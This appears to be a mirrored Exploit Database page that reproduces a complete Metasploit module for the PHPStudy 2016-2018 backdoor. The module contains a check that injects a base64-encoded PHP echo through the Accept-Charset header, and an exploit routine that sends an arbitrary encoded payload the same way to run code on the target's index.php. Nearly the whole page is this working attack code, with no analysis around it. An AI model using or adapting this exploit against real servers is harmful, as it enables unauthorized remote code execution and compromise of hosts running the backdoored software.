PHPStudy – Backdoor Remote Code execution (Metasploit)

• Exploit Database
• 117 阅读

• 作者： Metasploit
  日期： 2020-03-10
• 类别：

  • remote
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/48192/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74

  ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking   include Msf::Exploit::Remote::HttpClient   def initialize(info={}) super(update_info(info, 'Name' => "PHPStudy Backdoor Remote Code execution", 'Description'=> %q{ This module can detect and exploit the backdoor of PHPStudy. }, 'License'=> MSF_LICENSE, 'Author' => [ 'Dimensional',#POC 'Airevan' #Metasploit Module ], 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets'=> [ ['PHPStudy 2016-2018', {}] ], 'References'=> [ ['URL', 'https://programmer.group/using-ghidra-to-analyze-the-back-door-of-phpstudy.html'] ], 'Privileged' => false, 'DisclosureDate' => "Sep 20 2019", 'DefaultTarget'=> 0 ))   register_options( [ OptString.new('TARGETURI', [true, 'The base path', '/']) ]) end def check uri = target_uri.path fingerprint = Rex::Text.rand_text_alpha(8) res = send_request_cgi({ 'method'=>'GET', 'uri' =>normalize_uri(uri, 'index.php'), 'headers' =>{ 'Accept-Encoding' =>'gzip,deflate', 'Accept-Charset'=>Rex::Text.encode_base64("echo '#{fingerprint}';") } })   if res && res.code == 200 && res.body.to_s.include?(fingerprint) return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end end def exploit uri = target_uri.path print_good("Sending shellcode") res = send_request_cgi({ 'method'=> 'GET', 'uri' => normalize_uri(uri, 'index.php'), 'headers' => { 'Accept-Encoding' => 'gzip,deflate', 'Accept-Charset'=> Rex::Text.encode_base64(payload.encoded) } }) end end